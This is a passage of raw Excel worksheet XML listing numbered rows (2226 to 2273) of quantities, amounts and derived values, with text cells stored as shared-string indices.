        <v>6889</v>
      </c>
      <c r="J2226" s="15">
        <v>1102.2336</v>
      </c>
      <c r="K2226" s="16"/>
    </row>
    <row r="2227" spans="2:11">
      <c r="B2227" s="9">
        <v>2261</v>
      </c>
      <c r="C2227" s="238" t="s">
        <v>10832</v>
      </c>
      <c r="D2227" s="238" t="s">
        <v>10833</v>
      </c>
      <c r="E2227" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F2227" s="238" t="s">
        <v>10834</v>
      </c>
      <c r="G2227" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H2227" s="10">
        <v>32</v>
      </c>
      <c r="I2227" s="14">
        <v>17829.38</v>
      </c>
      <c r="J2227" s="15">
        <v>2852.7104</v>
      </c>
      <c r="K2227" s="16"/>
    </row>
    <row r="2228" spans="2:11">
      <c r="B2228" s="9">
        <v>2262</v>
      </c>
      <c r="C2228" s="238" t="s">
        <v>10835</v>
      </c>
      <c r="D2228" s="238" t="s">
        <v>10836</v>
      </c>
      <c r="E2228" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F2228" s="238" t="s">
        <v>10837</v>
      </c>
      <c r="G2228" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H2228" s="10">
        <v>8</v>
      </c>
      <c r="I2228" s="14">
        <v>3234.59</v>
      </c>
      <c r="J2228" s="15">
        <v>517.5296</v>
      </c>
      <c r="K2228" s="16"/>
    </row>
    <row r="2229" spans="2:11">
      <c r="B2229" s="9">
        <v>2263</v>
      </c>
      <c r="C2229" s="238" t="s">
        <v>10838</v>
      </c>
      <c r="D2229" s="238" t="s">
        <v>10839</v>
      </c>
      <c r="E2229" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F2229" s="238" t="s">
        <v>10840</v>
      </c>
      <c r="G2229" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2229" s="10">
        <v>4</v>
      </c>
      <c r="I2229" s="14">
        <v>102.44</v>
      </c>
      <c r="J2229" s="15">
        <v>16.3904</v>
      </c>
      <c r="K2229" s="16"/>
    </row>
    <row r="2230" spans="2:11">
      <c r="B2230" s="9">
        <v>2264</v>
      </c>
      <c r="C2230" s="238" t="s">
        <v>10841</v>
      </c>
      <c r="D2230" s="238" t="s">
        <v>10842</v>
      </c>
      <c r="E2230" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F2230" s="238" t="s">
        <v>10843</v>
      </c>
      <c r="G2230" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2230" s="10">
        <v>21</v>
      </c>
      <c r="I2230" s="14">
        <v>48.2</v>
      </c>
      <c r="J2230" s="15">
        <v>7.728</v>
      </c>
      <c r="K2230" s="16"/>
    </row>
    <row r="2231" spans="2:11">
      <c r="B2231" s="9">
        <v>2265</v>
      </c>
      <c r="C2231" s="238" t="s">
        <v>10844</v>
      </c>
      <c r="D2231" s="238" t="s">
        <v>8546</v>
      </c>
      <c r="E2231" s="238" t="s">
        <v>10845</v>
      </c>
      <c r="F2231" s="9"/>
      <c r="G2231" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2231" s="10">
        <v>134</v>
      </c>
      <c r="I2231" s="14">
        <v>15652.41</v>
      </c>
      <c r="J2231" s="15">
        <v>2504.4064</v>
      </c>
      <c r="K2231" s="16"/>
    </row>
    <row r="2232" spans="2:11">
      <c r="B2232" s="9">
        <v>2266</v>
      </c>
      <c r="C2232" s="238" t="s">
        <v>10846</v>
      </c>
      <c r="D2232" s="238" t="s">
        <v>10847</v>
      </c>
      <c r="E2232" s="238" t="s">
        <v>10848</v>
      </c>
      <c r="F2232" s="238" t="s">
        <v>10849</v>
      </c>
      <c r="G2232" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2232" s="10">
        <v>2</v>
      </c>
      <c r="I2232" s="14">
        <v>1895.32</v>
      </c>
      <c r="J2232" s="15">
        <v>303.2512</v>
      </c>
      <c r="K2232" s="16"/>
    </row>
    <row r="2233" spans="2:11">
      <c r="B2233" s="9">
        <v>2267</v>
      </c>
      <c r="C2233" s="238" t="s">
        <v>10850</v>
      </c>
      <c r="D2233" s="238" t="s">
        <v>10851</v>
      </c>
      <c r="E2233" s="238" t="s">
        <v>10852</v>
      </c>
      <c r="F2233" s="238" t="s">
        <v>10853</v>
      </c>
      <c r="G2233" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2233" s="10">
        <v>63</v>
      </c>
      <c r="I2233" s="14">
        <v>3232.84</v>
      </c>
      <c r="J2233" s="15">
        <v>517.2048</v>
      </c>
      <c r="K2233" s="16"/>
    </row>
    <row r="2234" spans="2:11">
      <c r="B2234" s="9">
        <v>2268</v>
      </c>
      <c r="C2234" s="238" t="s">
        <v>10854</v>
      </c>
      <c r="D2234" s="238" t="s">
        <v>6065</v>
      </c>
      <c r="E2234" s="238" t="s">
        <v>6726</v>
      </c>
      <c r="F2234" s="238" t="s">
        <v>10855</v>
      </c>
      <c r="G2234" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2234" s="10">
        <v>2</v>
      </c>
      <c r="I2234" s="14">
        <v>1452.99</v>
      </c>
      <c r="J2234" s="15">
        <v>232.48</v>
      </c>
      <c r="K2234" s="16"/>
    </row>
    <row r="2235" spans="2:11">
      <c r="B2235" s="9">
        <v>2269</v>
      </c>
      <c r="C2235" s="238" t="s">
        <v>10856</v>
      </c>
      <c r="D2235" s="238" t="s">
        <v>10857</v>
      </c>
      <c r="E2235" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F2235" s="238" t="s">
        <v>10858</v>
      </c>
      <c r="G2235" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2235" s="10">
        <v>4</v>
      </c>
      <c r="I2235" s="14">
        <v>156.27</v>
      </c>
      <c r="J2235" s="15">
        <v>25.0048</v>
      </c>
      <c r="K2235" s="16"/>
    </row>
    <row r="2236" spans="2:11">
      <c r="B2236" s="9">
        <v>2270</v>
      </c>
      <c r="C2236" s="238" t="s">
        <v>10859</v>
      </c>
      <c r="D2236" s="238" t="s">
        <v>10860</v>
      </c>
      <c r="E2236" s="238" t="s">
        <v>10861</v>
      </c>
      <c r="F2236" s="238" t="s">
        <v>10862</v>
      </c>
      <c r="G2236" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2236" s="10">
        <v>2</v>
      </c>
      <c r="I2236" s="14">
        <v>471.79</v>
      </c>
      <c r="J2236" s="15">
        <v>75.488</v>
      </c>
      <c r="K2236" s="16"/>
    </row>
    <row r="2237" spans="2:11">
      <c r="B2237" s="9">
        <v>2271</v>
      </c>
      <c r="C2237" s="238" t="s">
        <v>10863</v>
      </c>
      <c r="D2237" s="238" t="s">
        <v>10864</v>
      </c>
      <c r="E2237" s="238" t="s">
        <v>10861</v>
      </c>
      <c r="F2237" s="238" t="s">
        <v>10865</v>
      </c>
      <c r="G2237" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2237" s="10">
        <v>2</v>
      </c>
      <c r="I2237" s="14">
        <v>439.32</v>
      </c>
      <c r="J2237" s="15">
        <v>70.2912</v>
      </c>
      <c r="K2237" s="16"/>
    </row>
    <row r="2238" spans="2:11">
      <c r="B2238" s="9">
        <v>2272</v>
      </c>
      <c r="C2238" s="238" t="s">
        <v>10866</v>
      </c>
      <c r="D2238" s="238" t="s">
        <v>10867</v>
      </c>
      <c r="E2238" s="238" t="s">
        <v>8387</v>
      </c>
      <c r="F2238" s="238" t="s">
        <v>10868</v>
      </c>
      <c r="G2238" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2238" s="10">
        <v>1</v>
      </c>
      <c r="I2238" s="14">
        <v>85221.77</v>
      </c>
      <c r="J2238" s="15">
        <v>13635.4832</v>
      </c>
      <c r="K2238" s="16"/>
    </row>
    <row r="2239" spans="2:11">
      <c r="B2239" s="9">
        <v>2273</v>
      </c>
      <c r="C2239" s="238" t="s">
        <v>10869</v>
      </c>
      <c r="D2239" s="238" t="s">
        <v>10870</v>
      </c>
      <c r="E2239" s="238" t="s">
        <v>10871</v>
      </c>
      <c r="F2239" s="238" t="s">
        <v>10872</v>
      </c>
      <c r="G2239" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2239" s="10">
        <v>5</v>
      </c>
      <c r="I2239" s="14">
        <v>4909.74</v>
      </c>
      <c r="J2239" s="15">
        <v>785.56</v>
      </c>
      <c r="K2239" s="16"/>
    </row>
    <row r="2240" spans="2:11">
      <c r="B2240" s="9">
        <v>2274</v>
      </c>
      <c r="C2240" s="238" t="s">
        <v>10873</v>
      </c>
      <c r="D2240" s="238" t="s">
        <v>10874</v>
      </c>
      <c r="E2240" s="238" t="s">
        <v>10875</v>
      </c>
      <c r="F2240" s="238" t="s">
        <v>10876</v>
      </c>
      <c r="G2240" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2240" s="10">
        <v>3</v>
      </c>
      <c r="I2240" s="14">
        <v>660.52</v>
      </c>
      <c r="J2240" s="15">
        <v>105.6816</v>
      </c>
      <c r="K2240" s="16"/>
    </row>
    <row r="2241" spans="2:11">
      <c r="B2241" s="9">
        <v>2275</v>
      </c>
      <c r="C2241" s="238" t="s">
        <v>10877</v>
      </c>
      <c r="D2241" s="238" t="s">
        <v>10878</v>
      </c>
      <c r="E2241" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2241" s="238" t="s">
        <v>10879</v>
      </c>
      <c r="G2241" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2241" s="10">
        <v>420</v>
      </c>
      <c r="I2241" s="14">
        <v>2464.68</v>
      </c>
      <c r="J2241" s="15">
        <v>394.464</v>
      </c>
      <c r="K2241" s="16"/>
    </row>
    <row r="2242" spans="2:11">
      <c r="B2242" s="9">
        <v>2276</v>
      </c>
      <c r="C2242" s="238" t="s">
        <v>10880</v>
      </c>
      <c r="D2242" s="238" t="s">
        <v>10881</v>
      </c>
      <c r="E2242" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2242" s="238" t="s">
        <v>10882</v>
      </c>
      <c r="G2242" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2242" s="10">
        <v>11</v>
      </c>
      <c r="I2242" s="14">
        <v>138.41</v>
      </c>
      <c r="J2242" s="15">
        <v>22.1408</v>
      </c>
      <c r="K2242" s="16"/>
    </row>
    <row r="2243" spans="2:11">
      <c r="B2243" s="9">
        <v>2277</v>
      </c>
      <c r="C2243" s="238" t="s">
        <v>10883</v>
      </c>
      <c r="D2243" s="238" t="s">
        <v>10884</v>
      </c>
      <c r="E2243" s="238" t="s">
        <v>10885</v>
      </c>
      <c r="F2243" s="238" t="s">
        <v>10886</v>
      </c>
      <c r="G2243" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2243" s="10">
        <v>5</v>
      </c>
      <c r="I2243" s="14">
        <v>1026.14</v>
      </c>
      <c r="J2243" s="15">
        <v>164.184</v>
      </c>
      <c r="K2243" s="16"/>
    </row>
    <row r="2244" spans="2:11">
      <c r="B2244" s="9">
        <v>2278</v>
      </c>
      <c r="C2244" s="238" t="s">
        <v>10887</v>
      </c>
      <c r="D2244" s="238" t="s">
        <v>10888</v>
      </c>
      <c r="E2244" s="238" t="s">
        <v>10889</v>
      </c>
      <c r="F2244" s="238" t="s">
        <v>10890</v>
      </c>
      <c r="G2244" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2244" s="10">
        <v>4</v>
      </c>
      <c r="I2244" s="14">
        <v>759.08</v>
      </c>
      <c r="J2244" s="15">
        <v>121.4528</v>
      </c>
      <c r="K2244" s="16"/>
    </row>
    <row r="2245" spans="2:11">
      <c r="B2245" s="9">
        <v>2279</v>
      </c>
      <c r="C2245" s="238" t="s">
        <v>10891</v>
      </c>
      <c r="D2245" s="238" t="s">
        <v>10892</v>
      </c>
      <c r="E2245" s="238" t="s">
        <v>10885</v>
      </c>
      <c r="F2245" s="238" t="s">
        <v>10893</v>
      </c>
      <c r="G2245" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2245" s="10">
        <v>9</v>
      </c>
      <c r="I2245" s="14">
        <v>1402.64</v>
      </c>
      <c r="J2245" s="15">
        <v>224.424</v>
      </c>
      <c r="K2245" s="16"/>
    </row>
    <row r="2246" spans="2:11">
      <c r="B2246" s="9">
        <v>2280</v>
      </c>
      <c r="C2246" s="238" t="s">
        <v>10894</v>
      </c>
      <c r="D2246" s="238" t="s">
        <v>10895</v>
      </c>
      <c r="E2246" s="238" t="s">
        <v>6319</v>
      </c>
      <c r="F2246" s="238" t="s">
        <v>10896</v>
      </c>
      <c r="G2246" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2246" s="10">
        <v>2</v>
      </c>
      <c r="I2246" s="14">
        <v>136.9</v>
      </c>
      <c r="J2246" s="15">
        <v>21.904</v>
      </c>
      <c r="K2246" s="16"/>
    </row>
    <row r="2247" spans="2:11">
      <c r="B2247" s="9">
        <v>2281</v>
      </c>
      <c r="C2247" s="238" t="s">
        <v>10897</v>
      </c>
      <c r="D2247" s="238" t="s">
        <v>10898</v>
      </c>
      <c r="E2247" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2247" s="238" t="s">
        <v>10899</v>
      </c>
      <c r="G2247" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2247" s="10">
        <v>38</v>
      </c>
      <c r="I2247" s="14">
        <v>6274.85</v>
      </c>
      <c r="J2247" s="15">
        <v>1003.9904</v>
      </c>
      <c r="K2247" s="16"/>
    </row>
    <row r="2248" spans="2:11">
      <c r="B2248" s="9">
        <v>2282</v>
      </c>
      <c r="C2248" s="238" t="s">
        <v>10900</v>
      </c>
      <c r="D2248" s="238" t="s">
        <v>10901</v>
      </c>
      <c r="E2248" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2248" s="238" t="s">
        <v>10902</v>
      </c>
      <c r="G2248" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2248" s="10">
        <v>12</v>
      </c>
      <c r="I2248" s="14">
        <v>5095.38</v>
      </c>
      <c r="J2248" s="15">
        <v>815.2704</v>
      </c>
      <c r="K2248" s="16"/>
    </row>
    <row r="2249" spans="2:11">
      <c r="B2249" s="9">
        <v>2283</v>
      </c>
      <c r="C2249" s="238" t="s">
        <v>10903</v>
      </c>
      <c r="D2249" s="238" t="s">
        <v>10904</v>
      </c>
      <c r="E2249" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2249" s="238" t="s">
        <v>10905</v>
      </c>
      <c r="G2249" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2249" s="10">
        <v>56</v>
      </c>
      <c r="I2249" s="14">
        <v>9362.4</v>
      </c>
      <c r="J2249" s="15">
        <v>1498.0224</v>
      </c>
      <c r="K2249" s="16"/>
    </row>
    <row r="2250" spans="2:11">
      <c r="B2250" s="9">
        <v>2284</v>
      </c>
      <c r="C2250" s="238" t="s">
        <v>10906</v>
      </c>
      <c r="D2250" s="238" t="s">
        <v>10907</v>
      </c>
      <c r="E2250" s="238" t="s">
        <v>4738</v>
      </c>
      <c r="F2250" s="238" t="s">
        <v>10908</v>
      </c>
      <c r="G2250" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2250" s="10">
        <v>3</v>
      </c>
      <c r="I2250" s="14">
        <v>4128.2</v>
      </c>
      <c r="J2250" s="15">
        <v>660.5136</v>
      </c>
      <c r="K2250" s="16"/>
    </row>
    <row r="2251" spans="2:11">
      <c r="B2251" s="9">
        <v>2285</v>
      </c>
      <c r="C2251" s="238" t="s">
        <v>10909</v>
      </c>
      <c r="D2251" s="238" t="s">
        <v>10910</v>
      </c>
      <c r="E2251" s="238" t="s">
        <v>10911</v>
      </c>
      <c r="F2251" s="238" t="s">
        <v>10912</v>
      </c>
      <c r="G2251" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2251" s="10">
        <v>1</v>
      </c>
      <c r="I2251" s="14">
        <v>5233.33</v>
      </c>
      <c r="J2251" s="15">
        <v>837.3328</v>
      </c>
      <c r="K2251" s="16"/>
    </row>
    <row r="2252" spans="2:11">
      <c r="B2252" s="9">
        <v>2286</v>
      </c>
      <c r="C2252" s="238" t="s">
        <v>10913</v>
      </c>
      <c r="D2252" s="238" t="s">
        <v>10914</v>
      </c>
      <c r="E2252" s="238" t="s">
        <v>10915</v>
      </c>
      <c r="F2252" s="238" t="s">
        <v>10916</v>
      </c>
      <c r="G2252" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2252" s="10">
        <v>6</v>
      </c>
      <c r="I2252" s="14">
        <v>362.14</v>
      </c>
      <c r="J2252" s="15">
        <v>57.9456</v>
      </c>
      <c r="K2252" s="16"/>
    </row>
    <row r="2253" spans="2:11">
      <c r="B2253" s="9">
        <v>2287</v>
      </c>
      <c r="C2253" s="238" t="s">
        <v>10917</v>
      </c>
      <c r="D2253" s="238" t="s">
        <v>10918</v>
      </c>
      <c r="E2253" s="238" t="s">
        <v>7968</v>
      </c>
      <c r="F2253" s="238" t="s">
        <v>10919</v>
      </c>
      <c r="G2253" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2253" s="10">
        <v>9</v>
      </c>
      <c r="I2253" s="14">
        <v>14.4</v>
      </c>
      <c r="J2253" s="15">
        <v>2.304</v>
      </c>
      <c r="K2253" s="16"/>
    </row>
    <row r="2254" spans="2:11">
      <c r="B2254" s="9">
        <v>2288</v>
      </c>
      <c r="C2254" s="238" t="s">
        <v>10920</v>
      </c>
      <c r="D2254" s="238" t="s">
        <v>10921</v>
      </c>
      <c r="E2254" s="238" t="s">
        <v>466</v>
      </c>
      <c r="F2254" s="238" t="s">
        <v>10922</v>
      </c>
      <c r="G2254" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2254" s="10">
        <v>9</v>
      </c>
      <c r="I2254" s="14">
        <v>7.21</v>
      </c>
      <c r="J2254" s="15">
        <v>1.152</v>
      </c>
      <c r="K2254" s="16"/>
    </row>
    <row r="2255" spans="2:11">
      <c r="B2255" s="9">
        <v>2289</v>
      </c>
      <c r="C2255" s="238" t="s">
        <v>10923</v>
      </c>
      <c r="D2255" s="238" t="s">
        <v>10924</v>
      </c>
      <c r="E2255" s="238" t="s">
        <v>10925</v>
      </c>
      <c r="F2255" s="238" t="s">
        <v>10926</v>
      </c>
      <c r="G2255" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2255" s="10">
        <v>9</v>
      </c>
      <c r="I2255" s="14">
        <v>5.76</v>
      </c>
      <c r="J2255" s="15">
        <v>0.9216</v>
      </c>
      <c r="K2255" s="16"/>
    </row>
    <row r="2256" spans="2:11">
      <c r="B2256" s="9">
        <v>2290</v>
      </c>
      <c r="C2256" s="238" t="s">
        <v>10927</v>
      </c>
      <c r="D2256" s="238" t="s">
        <v>10928</v>
      </c>
      <c r="E2256" s="238" t="s">
        <v>10929</v>
      </c>
      <c r="F2256" s="238" t="s">
        <v>10930</v>
      </c>
      <c r="G2256" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2256" s="10">
        <v>112</v>
      </c>
      <c r="I2256" s="14">
        <v>539.71</v>
      </c>
      <c r="J2256" s="15">
        <v>86.3744</v>
      </c>
      <c r="K2256" s="16"/>
    </row>
    <row r="2257" spans="2:11">
      <c r="B2257" s="9">
        <v>2291</v>
      </c>
      <c r="C2257" s="238" t="s">
        <v>10931</v>
      </c>
      <c r="D2257" s="238" t="s">
        <v>10932</v>
      </c>
      <c r="E2257" s="238" t="s">
        <v>10933</v>
      </c>
      <c r="F2257" s="238" t="s">
        <v>10934</v>
      </c>
      <c r="G2257" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2257" s="10">
        <v>53</v>
      </c>
      <c r="I2257" s="14">
        <v>384.26</v>
      </c>
      <c r="J2257" s="15">
        <v>61.48</v>
      </c>
      <c r="K2257" s="16"/>
    </row>
    <row r="2258" spans="2:11">
      <c r="B2258" s="9">
        <v>2292</v>
      </c>
      <c r="C2258" s="238" t="s">
        <v>10935</v>
      </c>
      <c r="D2258" s="238" t="s">
        <v>10936</v>
      </c>
      <c r="E2258" s="238" t="s">
        <v>10937</v>
      </c>
      <c r="F2258" s="238" t="s">
        <v>10938</v>
      </c>
      <c r="G2258" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2258" s="10">
        <v>2</v>
      </c>
      <c r="I2258" s="14">
        <v>113.07</v>
      </c>
      <c r="J2258" s="15">
        <v>18.0928</v>
      </c>
      <c r="K2258" s="16"/>
    </row>
    <row r="2259" spans="2:11">
      <c r="B2259" s="9">
        <v>2293</v>
      </c>
      <c r="C2259" s="238" t="s">
        <v>10939</v>
      </c>
      <c r="D2259" s="238" t="s">
        <v>10940</v>
      </c>
      <c r="E2259" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2259" s="238" t="s">
        <v>10941</v>
      </c>
      <c r="G2259" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2259" s="10">
        <v>9</v>
      </c>
      <c r="I2259" s="14">
        <v>37.23</v>
      </c>
      <c r="J2259" s="15">
        <v>5.9616</v>
      </c>
      <c r="K2259" s="16"/>
    </row>
    <row r="2260" spans="2:11">
      <c r="B2260" s="9">
        <v>2294</v>
      </c>
      <c r="C2260" s="238" t="s">
        <v>10942</v>
      </c>
      <c r="D2260" s="238" t="s">
        <v>10943</v>
      </c>
      <c r="E2260" s="238" t="s">
        <v>5327</v>
      </c>
      <c r="F2260" s="238" t="s">
        <v>10944</v>
      </c>
      <c r="G2260" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2260" s="10">
        <v>1</v>
      </c>
      <c r="I2260" s="14">
        <v>12196.58</v>
      </c>
      <c r="J2260" s="15">
        <v>1951.4528</v>
      </c>
      <c r="K2260" s="16"/>
    </row>
    <row r="2261" spans="2:11">
      <c r="B2261" s="9">
        <v>2295</v>
      </c>
      <c r="C2261" s="238" t="s">
        <v>10945</v>
      </c>
      <c r="D2261" s="238" t="s">
        <v>10946</v>
      </c>
      <c r="E2261" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2261" s="238" t="s">
        <v>10948</v>
      </c>
      <c r="G2261" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2261" s="10">
        <v>2</v>
      </c>
      <c r="I2261" s="14">
        <v>599.3</v>
      </c>
      <c r="J2261" s="15">
        <v>95.888</v>
      </c>
      <c r="K2261" s="16"/>
    </row>
    <row r="2262" spans="2:11">
      <c r="B2262" s="9">
        <v>2296</v>
      </c>
      <c r="C2262" s="238" t="s">
        <v>10949</v>
      </c>
      <c r="D2262" s="238" t="s">
        <v>10950</v>
      </c>
      <c r="E2262" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2262" s="238" t="s">
        <v>10951</v>
      </c>
      <c r="G2262" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2262" s="10">
        <v>2</v>
      </c>
      <c r="I2262" s="14">
        <v>2476.63</v>
      </c>
      <c r="J2262" s="15">
        <v>396.2624</v>
      </c>
      <c r="K2262" s="16"/>
    </row>
    <row r="2263" spans="2:11">
      <c r="B2263" s="9">
        <v>2297</v>
      </c>
      <c r="C2263" s="238" t="s">
        <v>10952</v>
      </c>
      <c r="D2263" s="238" t="s">
        <v>10953</v>
      </c>
      <c r="E2263" s="238" t="s">
        <v>10947</v>
      </c>
      <c r="F2263" s="9"/>
      <c r="G2263" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2263" s="10">
        <v>38</v>
      </c>
      <c r="I2263" s="14">
        <v>10028.36</v>
      </c>
      <c r="J2263" s="15">
        <v>1604.512</v>
      </c>
      <c r="K2263" s="16"/>
    </row>
    <row r="2264" spans="2:11">
      <c r="B2264" s="9">
        <v>2298</v>
      </c>
      <c r="C2264" s="238" t="s">
        <v>10954</v>
      </c>
      <c r="D2264" s="238" t="s">
        <v>10955</v>
      </c>
      <c r="E2264" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F2264" s="238" t="s">
        <v>10956</v>
      </c>
      <c r="G2264" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2264" s="10">
        <v>222</v>
      </c>
      <c r="I2264" s="14">
        <v>2793.04</v>
      </c>
      <c r="J2264" s="15">
        <v>446.8416</v>
      </c>
      <c r="K2264" s="16"/>
    </row>
    <row r="2265" spans="2:11">
      <c r="B2265" s="9">
        <v>2299</v>
      </c>
      <c r="C2265" s="238" t="s">
        <v>10957</v>
      </c>
      <c r="D2265" s="238" t="s">
        <v>10958</v>
      </c>
      <c r="E2265" s="238" t="s">
        <v>7939</v>
      </c>
      <c r="F2265" s="238" t="s">
        <v>10959</v>
      </c>
      <c r="G2265" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2265" s="10">
        <v>1</v>
      </c>
      <c r="I2265" s="14">
        <v>6548.98</v>
      </c>
      <c r="J2265" s="15">
        <v>1047.8368</v>
      </c>
      <c r="K2265" s="16"/>
    </row>
    <row r="2266" spans="2:11">
      <c r="B2266" s="9">
        <v>2300</v>
      </c>
      <c r="C2266" s="238" t="s">
        <v>10960</v>
      </c>
      <c r="D2266" s="238" t="s">
        <v>10961</v>
      </c>
      <c r="E2266" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2266" s="238" t="s">
        <v>10962</v>
      </c>
      <c r="G2266" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2266" s="10">
        <v>26</v>
      </c>
      <c r="I2266" s="14">
        <v>138.04</v>
      </c>
      <c r="J2266" s="15">
        <v>22.0896</v>
      </c>
      <c r="K2266" s="16"/>
    </row>
    <row r="2267" spans="2:11">
      <c r="B2267" s="9">
        <v>2301</v>
      </c>
      <c r="C2267" s="238" t="s">
        <v>10963</v>
      </c>
      <c r="D2267" s="238" t="s">
        <v>6887</v>
      </c>
      <c r="E2267" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F2267" s="238" t="s">
        <v>10964</v>
      </c>
      <c r="G2267" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2267" s="10">
        <v>28</v>
      </c>
      <c r="I2267" s="14">
        <v>478.64</v>
      </c>
      <c r="J2267" s="15">
        <v>191.408</v>
      </c>
      <c r="K2267" s="16"/>
    </row>
    <row r="2268" spans="2:11">
      <c r="B2268" s="9">
        <v>2302</v>
      </c>
      <c r="C2268" s="238" t="s">
        <v>10965</v>
      </c>
      <c r="D2268" s="238" t="s">
        <v>10966</v>
      </c>
      <c r="E2268" s="238" t="s">
        <v>5318</v>
      </c>
      <c r="F2268" s="238" t="s">
        <v>10967</v>
      </c>
      <c r="G2268" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2268" s="10">
        <v>1</v>
      </c>
      <c r="I2268" s="14">
        <v>52.6</v>
      </c>
      <c r="J2268" s="15">
        <v>21.04</v>
      </c>
      <c r="K2268" s="16"/>
    </row>
    <row r="2269" spans="2:11">
      <c r="B2269" s="9">
        <v>2303</v>
      </c>
      <c r="C2269" s="238" t="s">
        <v>10968</v>
      </c>
      <c r="D2269" s="238" t="s">
        <v>10969</v>
      </c>
      <c r="E2269" s="238" t="s">
        <v>10970</v>
      </c>
      <c r="F2269" s="238" t="s">
        <v>10971</v>
      </c>
      <c r="G2269" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2269" s="10">
        <v>3</v>
      </c>
      <c r="I2269" s="14">
        <v>635.88</v>
      </c>
      <c r="J2269" s="15">
        <v>101.7408</v>
      </c>
      <c r="K2269" s="16"/>
    </row>
    <row r="2270" spans="2:11">
      <c r="B2270" s="9">
        <v>2304</v>
      </c>
      <c r="C2270" s="238" t="s">
        <v>10972</v>
      </c>
      <c r="D2270" s="238" t="s">
        <v>8579</v>
      </c>
      <c r="E2270" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F2270" s="238" t="s">
        <v>10973</v>
      </c>
      <c r="G2270" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2270" s="10">
        <v>30</v>
      </c>
      <c r="I2270" s="14">
        <v>15188.85</v>
      </c>
      <c r="J2270" s="15">
        <v>2430.24</v>
      </c>
      <c r="K2270" s="16"/>
    </row>
    <row r="2271" spans="2:11">
      <c r="B2271" s="9">
        <v>2305</v>
      </c>
      <c r="C2271" s="238" t="s">
        <v>10974</v>
      </c>
      <c r="D2271" s="238" t="s">
        <v>10975</v>
      </c>
      <c r="E2271" s="238" t="s">
        <v>10976</v>
      </c>
      <c r="F2271" s="238" t="s">
        <v>10977</v>
      </c>
      <c r="G2271" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2271" s="10">
        <v>15</v>
      </c>
      <c r="I2271" s="14">
        <v>14374.83</v>
      </c>
      <c r="J2271" s="15">
        <v>2299.968</v>
      </c>
      <c r="K2271" s="16"/>
    </row>
    <row r="2272" spans="2:11">
      <c r="B2272" s="9">
        <v>2306</v>
      </c>
      <c r="C2272" s="238" t="s">
        <v>10978</v>
      </c>
      <c r="D2272" s="238" t="s">
        <v>10979</v>
      </c>
      <c r="E2272" s="238" t="s">
        <v>10980</v>
      </c>
      <c r="F2272" s="238" t="s">
        <v>10981</v>
      </c>
      <c r="G2272" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2272" s="10">
        <v>3</v>
      </c>
      <c r="I2272" s="14">
        <v>697.95</v>
      </c>
      <c r="J2272" s="15">
        <v>111.672</v>
      </c>
      <c r="K2272" s="16"/>
    </row>
    <row r="2273" spans="2:11">
      <c r="B2273" s="9">
        <v>2307</v>
      </c>
      <c r="C2273" s="238" t="s">
        <v>10982</v>
      </c>
      <c r="D2273" s="238" t="s">
        <v>10983</v>
      </c>
      <c r="E2273" s="238" t="s">
        <v>10984</v>
      </c>
      <c r="F2273" s="238" t="s">
        <v>10985</v>
      </c>
      <c r="G2273" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2273" s="10">
        <v>9</v>
      </c>
      <c r="I2273" s="14">
        <v>2370.77</v>
